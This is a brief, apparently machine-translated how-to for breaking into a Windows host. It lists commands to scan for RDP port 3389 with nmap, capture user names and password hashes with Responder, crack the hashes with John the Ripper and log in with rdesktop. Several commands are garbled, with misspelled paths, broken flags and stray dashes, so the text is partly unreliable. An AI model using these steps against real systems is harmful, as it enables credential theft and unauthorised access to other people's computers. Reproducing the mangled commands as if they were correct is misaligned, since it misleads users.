Check the remote computer IP
Ipconfig
Scan remote host open ports (see if port 3389)
Nmap - Pn *. *. *. * (IP)
Perform penetration operations
The responder -i eth0 - wv
Wait for a while and terminal will display the user name and password (hash)
Password cracking, by John view into the following directory:/usr/share/responer/logs,
John HTTP - *. TXT -- -- wordlist=/usr/share/wordlists unencrypted usernames. TXT
Log in to the remote host
Rdesktop -u kail *
Finally released in: 2019-04-17